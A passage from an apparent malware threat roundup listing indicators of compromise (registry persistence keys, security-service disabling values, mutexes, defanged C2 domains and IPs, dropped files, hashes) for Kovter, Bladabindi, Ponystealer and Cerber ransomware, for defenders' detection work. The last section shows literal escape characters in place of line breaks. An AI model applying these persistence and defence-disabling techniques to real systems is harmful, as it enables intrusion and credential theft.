`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS` (Value Name: Load) | 11
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` (Value Name: 1081297374) | 11
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN` (Value Name: 1081297374) | 11
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN` | 11
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM` (Value Name: EnableLUA) | 9
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC` (Value Name: Start) | 9
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND` (Value Name: Start) | 9
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC` (Value Name: Start) | 9
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER` (Value Name: HideSCAHealth) | 9
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER` (Value Name: HideSCAHealth) | 9
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV` (Value Name: Start) | 9
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER` (Value Name: TaskbarNoNotification) | 9
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER` (Value Name: TaskbarNoNotification) | 9
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` (Value Name: Sidebars) | 2
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` (Value Name: twunk_16.exe) | 1
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON` (Value Name: Taskman) | 1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON` (Value Name: Shell) | 1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` (Value Name: Windows Update Manager) | 1
`<HKCU>\SOFTWARE\WINRAR` (Value Name: HWID) | 1
`<HKCU>\SOFTWARE\WINRAR` | 1
`<HKCU>\SOFTWARE\MICROSOFT\MODULES` | 1
`<HKCU>\SOFTWARE\MICROSOFT\MODULES` (Value Name: Number) | 1
`<HKCU>\SOFTWARE\MICROSOFT\NOTEPAD` (Value Name: Body) | 1

Mutexes | Occurrences
---|---
`alFSVWJB` | 2
`PuredairyBB9` | 1
`PuredairyBB10` | 1
`PuredairyBB2` | 1
`PuredairyBB4` | 1
`PuredairyBB8` | 1
`PuredairyBB7` | 1
`PuredairyBB6` | 1
`PuredairyBB15` | 1
`PuredairyBB14` | 1
`PuredairyBB13` | 1
`PuredairyBB12` | 1
`PSPSndkvsdvd0199201` | 1
`PuredairyBB1` | 1
`PuredairyBB5` | 1
`PuredairyBB3` | 1
`PuredairyBB16` | 1
`PuredairyBB17` | 1
`PuredairyBB18` | 1
`PuredairyBB22` | 1
`PuredairyBB20` | 1
`PuredairyBB21` | 1
`PuredairyBB19` | 1
`PuredairyBB29` | 1
`PuredairyBB31` | 1

*See JSON for more IOCs

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`195[.]22[.]26[.]248` | 2
`23[.]253[.]126[.]58` | 2
`184[.]105[.]192[.]2` | 6
`104[.]239[.]157[.]210` | 2
`104[.]42[.]225[.]122` | 8
`40[.]90[.]247[.]210` | 5
`40[.]91[.]124[.]111` | 4
`20[.]45[.]1[.]107` | 9
`109[.]120[.]180[.]29` | 2
`94[.]102[.]52[.]19` | 1
`217[.]23[.]8[.]142` | 1
`109[.]236[.]86[.]119` | 1
`93[.]190[.]140[.]141` | 1
`108[.]59[.]2[.]221` | 1
`109[.]236[.]83[.]12` | 1
`80[.]82[.]65[.]207` | 1
`217[.]23[.]3[.]105` | 1
`217[.]23[.]4[.]220` | 1
`93[.]190[.]140[.]113` | 1
`217[.]23[.]9[.]104` | 1
`93[.]190[.]142[.]191` | 1
`94[.]102[.]51[.]231` | 1
`217[.]23[.]7[.]3` | 1
`80[.]82[.]65[.]199` | 1
`109[.]236[.]86[.]27` | 1

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`europe[.]pool[.]ntp[.]org` | 9
`www[.]update[.]microsoft[.]com[.]nsatc[.]net` | 9
`and10[.]uzuzuseubumaandro[.]com` | 1
`powerrembo[.]ru` | 2
`and4[.]junglebeariwtc1[.]com` | 1
`faumoussuperstars[.]ru` | 2
`martivitapoint[.]info` | 1
`and10[.]uzuzuseubumaandro1[.]com` | 1
`spotxte[.]com` | 1
`nutqauytva8azxd[.]com` | 2
`nutqauytva100azxd[.]com` | 2
`nutqauytva2azxd[.]com` | 2
`nutqauytva10azxd[.]com` | 2
`nutqauytva6azxd[.]com` | 2
`nutqauytva11azxd[.]com` | 2
`nutqauytva3azxd[.]com` | 2
`nutqauytva9azxd[.]com` | 2
`nutqauytva7azxd[.]com` | 2
`nutqauytva5azxd[.]com` | 2
`nutqauytva4azxd[.]com` | 2
`109[.]120[.]180[.]29` | 1
`vedivenivici[.]ml` | 2
`delvernet[.]info` | 2
`otter[.]pw` | 2
`oingee[.]pw` | 2

*See JSON for more IOCs

Files and/or directories created | Occurrences
---|---
`\Documents and Settings\All Users\mslkrru.exe` | 9
`%APPDATA%\WindowsUpdate` | 1
`\RECYCLER` | 7
`\RECYCLER\S-1-5-21-0243556031-888888379-781862338-18611771` | 5
`\TEMP\C\UPDATE` | 1
`%APPDATA%\WindowsUpdate\MSupdate.exe` | 1
`%APPDATA%\alFSVWJB` | 2
`%ProgramData%\msodtyzm.exe` | 11
`\RECYCLER\S-1-5-21-0243556031-888888379-781862338-1861771` | 2
`%ProgramData%\~` | 11
`%APPDATA%\alFSVWJB\twunk_16.exe` | 1
`%APPDATA%\winamfes.exe` | 2
`%APPDATA%\alFSVWJB\splwow64.exe` | 1
`%TEMP%\-1631195624.bat` | 1
`%TEMP%\115828.bat` | 1
`%APPDATA%\alFSVWJB\winhlp32.exe` | 1

#### File Hashes

```
0e6f120bd1607731a34778c8d2f3a038414dd3d263ca25c5e5941558ece492ca
1237cef1686205e9854f84be62f474247279e72dedc0b5e871b7c07c9c5126e4
1d453682f2771631919717c54b95b6e90a1e4231c9c503ef4b5fa302e247d314
1f7c808b0fb82df3a2e27e4819224d176f1be5dca98752ca0545591e740112e6
20ba9da6df29a870a6826425b23b7508606bdaad662f0238da378091ed1067ef
2324b414e6300fab1abdc2d1e5bb128544c94419dcc6656b105bc69865480d88
36b578d5abac82fd7db98a77869112dbf7e0bfa8433febca08b1c16370f68a2f
3887f3a97e906d5bd9d94ba1117953c46ba0dd1cd5fbae4653f4cd1924ae258e
5f4293450ad2aca70c70bdc55bfa2db00bc500b73000814a9b995f940c4e8c41
68b13c4a8a9fe01bf0567627d099b1a6cb98eef7bd4762bbee5420efbcc8a470
693086bd9b704e5927f76f40a8b04136b1f7d94a482a9020126819a407d24aa8
6edddbf48f261ae99c5a7dfd3fc2c443a3674f68ca3076b391c89e7023dc4c54
70c203465f54113975e075563cf824ba3632a3227eddd38c651b8f5a58cf2bae
7b3c8d5208b4c9e1747e670c67d44a581c68e299a486eba6d7f96cbe527e6855
7b3efe2cf5dc30bf2329986bdcd680f4195a8f750f507e96a3395d8a4a9310fb
82687cd40932329348005bb61782e5b5493faae26389d7a3300e5ba40af04dce
87892d4d4693dc87d4195a0aa30bba294841580f2a4c81948c37018b69dc69d8
966eac6b067db2163c8e82669373c17ea335fff18280f848e6b8202e00a905d2
98788fbe094bd1260aaa7120fa02cf183ab09f7a32c0a4cba68074316c276ce6
aa6eea166b8cffd5763b79f47f6f8cbeea328a056e7a0152ceb104cc59c1e320
bec5979b7d191703cbce4a4c88171b89ab97b07fba0e0dd001ffe8dee9689049
d3f847257945d883bc02431f7561d661b56b7177941b5d7451528bdfc28b4ca6
d6f2570910b38e15acb876ced00d7f877fa9ded01a15c3e07710319a50adf8cb
d7f4e9cab07e8c2826ee70b6a45d51b18892cfa5d4a92ce318c43eed2399fe54
da93ffcafad1569fd94cb5bae72a876bf6e021b7ad30b4d644a99ceb88651bc6
```

#### Coverage

Product | Protection
---|---
AMP |
Cloudlock | N/A
CWS |
Email Security |
Network Security |
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella |
WSA |

#### Screenshots of Detection

#### AMP

[AMP detection screenshot](<https://1.bp.blogspot.com/-essWD6jQn98/XkbkvQMAvWI/AAAAAAAADSo/bh8oOsTllLUEQwUn1IophA4XDimJYhOyACLcBGAsYHQ/s1600/5f4293450ad2aca70c70bdc55bfa2db00bc500b73000814a9b995f940c4e8c41_amp.png>)

#### ThreatGrid

[ThreatGrid detection screenshot](<https://1.bp.blogspot.com/-XUwmAjmy9ew/XkbkzJwdRGI/AAAAAAAADSs/xPUmGpebw9w7DDIYT8tr5woLymKe-hbrQCLcBGAsYHQ/s1600/5f4293450ad2aca70c70bdc55bfa2db00bc500b73000814a9b995f940c4e8c41_tg.png>)

#### Umbrella

[Umbrella detection screenshot](<https://1.bp.blogspot.com/-pnZSPvSBJmk/Xkbk33ih9QI/AAAAAAAADSw/bO3pg221ueYN8fpJxUqsIARE5fAeurJjACLcBGAsYHQ/s1600/1237cef1686205e9854f84be62f474247279e72dedc0b5e871b7c07c9c5126e4_umbrella.png>)

* * *

### Win.Trojan.Kovter-7581113-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE` (Value Name: DisableOSUpgrade) | 15
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE` (Value Name: ReservationsAllowed) | 15
`<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1` (Value Name: 656f27d6) | 15
`<HKCU>\SOFTWARE\3A91C13AB1` (Value Name: 656f27d6) | 15
`<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1` (Value Name: 96f717b3) | 15
`<HKCU>\SOFTWARE\3A91C13AB1` (Value Name: 96f717b3) | 15
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE` | 15
`<HKCU>\SOFTWARE\3A91C13AB1` | 15
`<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1` | 15
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE` | 15
`<HKCR>\.8CA9D7` | 15
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` (Value Name: eed5bf47) | 15
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` (Value Name: edfc5b63) | 15
`<HKCR>\C3B61` | 15
`<HKCR>\C3B61\SHELL` | 15
`<HKCR>\C3B61\SHELL\OPEN` | 15
`<HKCR>\C3B61\SHELL\OPEN\COMMAND` | 15
`<HKCR>\.8CA9D7` | 15
`<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1` (Value Name: ffcfae7b) | 15
`<HKCU>\SOFTWARE\3A91C13AB1` (Value Name: ffcfae7b) | 15
`<HKCU>\SOFTWARE\3A91C13AB1` (Value Name: 78758f10) | 15
`<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1` (Value Name: 78758f10) | 15
`<HKCU>\SOFTWARE\3A91C13AB1` (Value Name: c3ab6058) | 15
`<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1` (Value Name: c3ab6058) | 15
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` (Value Name: 8567f942) | 15

Mutexes | Occurrences
---|---
`EA4EC370D1E573DA` | 15
`A83BAA13F950654C` | 15
`Global\7A7146875A8CDE1E` | 15
`B3E8F6F86CDD9D8B` | 15

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`162[.]59[.]22[.]216` | 1
`203[.]220[.]231[.]209` | 1
`35[.]30[.]2[.]211` | 1
`65[.]168[.]33[.]91` | 1
`65[.]23[.]68[.]193` | 1
`8[.]111[.]224[.]146` | 1
`190[.]95[.]112[.]80` | 1
`17[.]163[.]64[.]9` | 1
`75[.]177[.]69[.]90` | 1
`166[.]105[.]213[.]36` | 1
`214[.]63[.]237[.]80` | 1
`36[.]91[.]76[.]70` | 1
`106[.]70[.]177[.]221` | 1
`16[.]191[.]214[.]15` | 1
`58[.]13[.]27[.]49` | 1
`192[.]86[.]250[.]64` | 1
`126[.]167[.]218[.]58` | 1
`15[.]150[.]185[.]79` | 1
`136[.]59[.]133[.]35` | 1
`14[.]24[.]198[.]67` | 1
`60[.]255[.]136[.]37` | 1
`35[.]118[.]226[.]214` | 1
`39[.]29[.]235[.]49` | 1
`154[.]111[.]27[.]104` | 1
`166[.]82[.]242[.]42` | 1

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`www[.]litespeedtech[.]com` | 1
`schema[.]org` | 1
`api[.]w[.]org` | 1
`gmpg[.]org` | 1
`pinterest[.]com` | 1
`httpd[.]apache[.]org` | 1
`bugs[.]debian[.]org` | 1
`www[.]anrdoezrs[.]net` | 1
`shareasale[.]com` | 1
`help[.]smartertools[.]com` | 1
`www[.]smartertools[.]com` | 1
`www[.]pntrs[.]com` | 1
`cdn10[.]bigcommerce[.]com` | 1
`cowgirldelight[.]com` | 1
`lppool[.]catalogsites[.]net` | 1
`www[.]rods[.]com` | 1
`checkspressions[.]com` | 1
`www[.]womensbootshop[.]com` | 1
`www[.]cssigniter[.]com` | 1
`passets-cdn[.]pinterest[.]com` | 1
`www[.]pntra[.]com` | 1

Files and/or directories created | Occurrences
---|---
`%LOCALAPPDATA%\4dd3c` | 15
`%LOCALAPPDATA%\4dd3c\519d0.bat` | 15
`%LOCALAPPDATA%\4dd3c\8e986.8ca9d7` | 15
`%LOCALAPPDATA%\4dd3c\d95ad.lnk` | 15
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\91b4e.lnk` | 15
`%APPDATA%\b08d6` | 15
`%APPDATA%\b08d6\0b3c0.8ca9d7` | 15

#### File Hashes

```
0bc765c9bdad7dea5fee981fa1ea3e39d39b43110991be6767062b5b3e04f72c
127fb45d6030c7ccccee832b5ce576786dbaae5df9b56894b69257e5217e294a
2ae6974b7efe312d521686e6852eeb699f2a73775742736b85b597e0ef3aa431
2fc52ad46802099597893005722950b74ac8625908227d1127a00666c4b335b9
30814d58a34c1f93bca33a91dff01df3d51d79652e03ee1d4268d4f3731c32e2
37ead0eac4578acd43bca94f7c952ca0ba292501902f3c24e2867d4c76987394
7271bdf260d1c23f06c6900ae8627662ae10029d1807128307bdfdaf216ec717
797903efd668c3b3f81419f0f14ed2c1877f051b237ca186f17559a536334d5c
7acad96af327bcdb132c8050fc85323173ac58b1efe91cadb529d2f9b4d98b27
82a312a0219ad8597a6d23b707103bbc5e5ba5a8f05754bf2c4904d857cd4c17
ab0bd0ecb30c8097d5270d8f4a093587dc92ac8b129a169c0488d74ad8a67037
b0b20a68922dc981bf2a4dcdda0545c0f870331a6eef2dc474fefe4d2e7af806
b7e3127dc7f2729513628861b8ee60609a1c20eedcd9b6551314dd0eeedd817e
beaa66c363f78e7bae7d9e16fdfaa2bad12a568db71f59a87ecfb675e8fef110
cef415b47d807cb26e0881d6d79ac1ab4cbb77e1671cdcb5804982309481a18d
```

#### Coverage

Product | Protection
---|---
AMP |
Cloudlock | N/A
CWS |
Email Security |
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella | N/A
WSA | N/A

#### Screenshots of Detection

#### AMP

[AMP detection screenshot](<https://1.bp.blogspot.com/-rHmOGYUnn3s/XkblI9uCPbI/AAAAAAAADTA/hTPnFRS2Is41M-ewgT-M8IsL59hsFItgwCLcBGAsYHQ/s1600/b0b20a68922dc981bf2a4dcdda0545c0f870331a6eef2dc474fefe4d2e7af806_amp.png>)

#### ThreatGrid

[ThreatGrid detection screenshot](<https://1.bp.blogspot.com/-7yDofoCL-Fs/XkblNUumwAI/AAAAAAAADTE/BxQtrDXc0y4VUTtwioNP4Kxhg7C8kP9NACLcBGAsYHQ/s1600/b0b20a68922dc981bf2a4dcdda0545c0f870331a6eef2dc474fefe4d2e7af806_tg.png>)

* * *

### PUA.Win.Trojan.Bladabindi-7581164-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\ENVIRONMENT` (Value Name: SEE_MASK_NOZONECHECKS) | 17
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON` (Value Name: ParseAutoexec) | 17
`<HKCU>\SOFTWARE\7261D3F24AE2C8DCAF22FAF7FCF1CAFD` | 17
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` (Value Name: 7261d3f24ae2c8dcaf22faf7fcf1cafd) | 17
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` (Value Name: 7261d3f24ae2c8dcaf22faf7fcf1cafd) | 17
`<HKCU>\SOFTWARE\7261D3F24AE2C8DCAF22FAF7FCF1CAFD` (Value Name: [kl]) | 17

Mutexes | Occurrences
---|---
`qazwsxedc` | 17
`7261d3f24ae2c8dcaf22faf7fcf1cafd` | 17

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`shareefboy[.]ddns[.]net` | 17

Files and/or directories created | Occurrences
---|---
`%HOMEPATH%\Start Menu\Programs\Startup\x.vbs` | 16
`%TEMP%\server.exe` | 17
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs` | 16
`\423002248.exex (copy)` | 1
`%TEMP%\server.exex (copy)` | 17

#### File Hashes

```
00cf99575699bc66ebbb6420a94c31ed8acad4107031546e04f9576546c276e5
245938f3b18f371c90e5403b454cadfa791d97767d9aa05439d6b852fbffd714
285cb077ca516c336a1636182069e7cf9a8a057a267efa376ebede4c0a2cd0bf
29dba26459bba5b186f1bf1c0a0fffc0e393a6d4cc427c842a4aee0353518a2c
2de7a2aa518ea9e0fbc421761c85be589c27c88c3038fa4fa93bef51bacd67bd
344204f0902906b808c5f81ae62b455a3d0ded3034fca548230cd51c59f02ec4
388bfe746f61ade70292f8740d1c92c6eceaa21baa5e04de0ebc012dbed312e7
66d6a4049df4e8bc2fd9c615af0bc3d0ae715ea5b17c5222980f67bd6d57d75e
7d2e2395490ac37029cd98039afa8991f718c5121b1e6e326713e99c26aacb28
8e7ea6439f856525f2affc885f93a23e2f7ade71aecc69c8cd78e5460d4aa58b
ae078923fc539c22a7eff4491301ae2c8f438e79a02226e6604b7035aff34ec5
aee215905b39a4a4cc85be54bda2ae9ded42e06fe0b3813a1794052a12e09757
c7a9a427985e84f296370c466eb675ff01b06992416ac9250c385cfaa5a9678d
d2af08616f7d2dc0f68d75376d3164867732871348c8101aa0319c90062f999b
d75a26758530f775943a9d16680ee4c37e913ab20d6953e965ae41f3e5fd3a88
d7ec97fb65437711f6dd0ce71e8cab70946d2c8f51566446a8fe8e8b64cbda62
fd05573a8360e8054c0ebc38c5cdd107e68b9694525829e832a3085c7d9a556b
```

#### Coverage

Product | Protection
---|---
AMP |
Cloudlock | N/A
CWS |
Email Security |
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella | N/A
WSA | N/A

#### Screenshots of Detection

#### AMP

[AMP detection screenshot](<https://1.bp.blogspot.com/-W5F1RN8Tm7I/Xkblcv7o31I/AAAAAAAADTM/tWcW6CL0BuE_G9-sU9ew3Pe1cB9SjFz-wCLcBGAsYHQ/s1600/7d2e2395490ac37029cd98039afa8991f718c5121b1e6e326713e99c26aacb28_amp.png>)

#### ThreatGrid

[ThreatGrid detection screenshot](<https://1.bp.blogspot.com/-ySnPmdkZ4R0/XkblhtE_bmI/AAAAAAAADTU/SW1w7x44-dYrOt3fVXzasbj_YktfYNZnACLcBGAsYHQ/s1600/7d2e2395490ac37029cd98039afa8991f718c5121b1e6e326713e99c26aacb28_tg.png>)

* * *

### Win.Packed.Ponystealer-7581286-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\WINRAR` (Value Name: HWID) | 17
`<HKCU>\SOFTWARE\WINRAR` | 17
`<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9` (Value Name: F) | 17
`<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000001F5` (Value Name: F) | 17
`<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003EC` (Value Name: F) | 17

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`194[.]4[.]56[.]252` | 17
`212[.]129[.]7[.]131` | 1

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`myp0nysite[.]ru` | 17
`streetcode3[.]com` | 1

Files and/or directories created | Occurrences
---|---
`%HOMEPATH%\Start Menu\Programs\Startup\filename.vbe` | 1
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\filename.vbe` | 17
`%APPDATA%\subfolder` | 17
`%APPDATA%\subfolder\filename.bat` | 17
`%TEMP%\811953.bat` | 1
`%TEMP%\-1509909074.bat` | 1

#### File Hashes

```
13400f8d7c8a12d8958a46992e9eed2b2f1151ae33fcd0c248bc35e58cfb7ce5
182f6e283a097173aaedb18790a25cf8d923918e715568b88446a345d086fcc0
2c20c1f5d4995dcccf424f00ceb0ed472cb4565ee7b06c9cb70b08b478eaf2f1
2deca9e99719e851fd53cee5ac5dfbd07b119bc707b7aa81cb55c38c8883a772
3182728acec97bc151ebae0a6adfac92ab26acf0c5aa1ab5194926b5e36f4d43
5a4373916b36d08a40753dbcdac9f5a4463ce04e34c9d91370ed3eb26d9e02ee
73ef9e3fd88857d97750893acb03308bb1deb980ca8ca601087bb9a1f74362a6
8dfce3b2ccb67e4d7fe864898a1464f74a536e14bd4104dff9de8c399d42c2b7
8fe9aeaa722e13e842520e578ed099670bc59c882b59a6fb413dc6fcf590665a
955b6ea1a4087486a22b60ca2453343b04ac01e5c161615b13fd8bd22192c76d
9a10bb237ac45ffee5878cdfe094a0b0f6f81d9eba8ec21033b8020391c1324f
bd4aa94a35201221e31df703e1140180c8f310ce7f08b81960185a2b784a98c0
ce3e0e36ac012f0f464181de7a21c87bfa1c5c334a11b7569ddb5dd4222c95e6
d07112d2911677ee1e1722bd168dff54d480c3ce8a9f78a84bf3339a885b0174
e2546be50a578b421d55de25bb7d7aff0ef84b5246d1d7d6f8ca8908da415ef4
e48083bef42265f0c16b3cb6fef65a4206f152b3cfdb28f517e15ca8a660ffed
fe83421fb5c10e194127d3b3d02e4bf2d1d951291bd935641d80f19bbf6ba620
```

#### Coverage

Product | Protection
---|---
AMP |
Cloudlock | N/A
CWS |
Email Security |
Network Security |
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella |
WSA |

#### Screenshots of Detection

#### AMP

[AMP detection screenshot](<https://1.bp.blogspot.com/-ZzGH1lfQaOM/Xkbl1DWh3cI/AAAAAAAADTg/5TealMCAQCwGV1Zr6ljcNU2rdZHiVw1ZACLcBGAsYHQ/s1600/182f6e283a097173aaedb18790a25cf8d923918e715568b88446a345d086fcc0_amp.png>)

#### ThreatGrid

[ThreatGrid detection screenshot](<https://1.bp.blogspot.com/-61hbPOtrq-I/Xkbl5sOFfsI/AAAAAAAADTk/0gll55PTzw8pVUvAL9kP9MMil-bAEgOKwCLcBGAsYHQ/s1600/182f6e283a097173aaedb18790a25cf8d923918e715568b88446a345d086fcc0_tg.png>)

#### Umbrella

[Umbrella detection screenshot](<https://1.bp.blogspot.com/-fPRNlwGrXtI/Xkbl_YvhU1I/AAAAAAAADTo/bpbeNHbR40kZwAtGk5U5wxxoMD39ioBIACLcBGAsYHQ/s1600/816593fbb5469d27ac05c4eeaed262ce5486ceef3aa50f6a5991dbf87e0b6e29_umbrella.png>)

* * *

### Win.Ransomware.Cerber-7582361-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\CONTROL PANEL\DESKTOP` (Value Name: TileWallpaper) | 7
`<HKCU>\CONTROL PANEL\DESKTOP` (Value Name: WallpaperStyle) | 7
`<HKCU>\SOFTWARE\MICROSOFT\SPEECH\VOICES` (Value Name: DefaultTokenId) | 6
`<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER` | 6
`<HKCU>\SOFTWARE\MICROSOFT\SPEECH\VOICES` | 6
`<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER` (Value Name: PendingFileRenameOperations) | 6
\n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: {32382BC4-48A5-6DE8-F0EE-B8109DEC3228} ` | 2 \nMutexes | Occurrences \n---|--- \n`shell.{<random GUID>}` | 8 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`13[.]107[.]21[.]200` | 2 \n`204[.]79[.]197[.]200` | 3 \n`15[.]49[.]2[.]0/27` | 8 \n`122[.]1[.]13[.]0/27` | 8 \n`194[.]165[.]17[.]0/25` | 8 \n`95[.]213[.]195[.]123` | 2 \n`91[.]142[.]90[.]61` | 7 \n`31[.]41[.]47[.]50` | 5 \n`31[.]41[.]47[.]31` | 1 \n`195[.]19[.]192[.]99` | 2 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`maxcdn[.]bootstrapcdn[.]com` | 1 \n`get[.]adobe[.]com` | 4 \n`en[.]wikipedia[.]org` | 14 \n`www[.]torproject[.]org` | 7 \n`www[.]collectionscanada[.]ca` | 7 \n`alpha3[.]suffolk[.]lib[.]ny[.]us` | 7 \n`www[.]archives[.]gov` | 7 \n`www[.]vitalrec[.]com` | 7 \n`www[.]cdc[.]gov` | 7 \n`hldsfuh[.]info` | 1 \n`mmteenijjjuyoqju[.]info` | 1 \n`ydgsjrjqotlffitfg[.]org` | 1 \n`dxpmkdipp[.]info` | 1 \n`cojkhmdxrwvxwxa[.]pw` | 1 \n`qgilcuym[.]org` | 1 \n`www[.]multicounter[.]de` | 9 \n`pqhwfeeivtkxi[.]click` | 5 \n`othcijmuhwb[.]pl` | 4 \n`iconhrdqmeueg[.]su` | 2 \n`cdwguymjxnyot[.]pl` | 3 \n`veiqvqirdhmyis[.]org` | 4 \n`qoaouhgwfy[.]biz` | 2 \n`hkwyfnevdievebgjx[.]xyz` | 2 \n`ligumssfsrtfpy[.]xyz` | 4 \n`rqtcmltkurtev[.]pw` | 2 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\Contacts\\Administrator.contact` | 15 \n`%TEMP%\\d19ab989\\4710.tmp` | 8 \n`%TEMP%\\d19ab989\\a35f.tmp` | 8 \n`\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\_14-INSTRUCTION.html` | 7 \n`\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\_15-INSTRUCTION.html` | 7 \n`\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\_16-INSTRUCTION.html` | 7 \n`\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\_17-INSTRUCTION.html` | 7 \n`\\MSOCache\\All 
Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\_18-INSTRUCTION.html` | 7 \n`\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\_19-INSTRUCTION.html` | 7 \n`\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\_20-INSTRUCTION.html` | 7 \n`%ProgramData%\\Adobe\\Updater6\\_21-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\_22-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\_24-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\_26-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\_25-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\_28-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\_27-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\IlsCache\\_29-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Network\\Downloader\\_46-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\_45-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\OfficeSoftwareProtectionPlatform\\_48-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\RAC\\PublishedData\\_44-INSTRUCTION.html` | 7 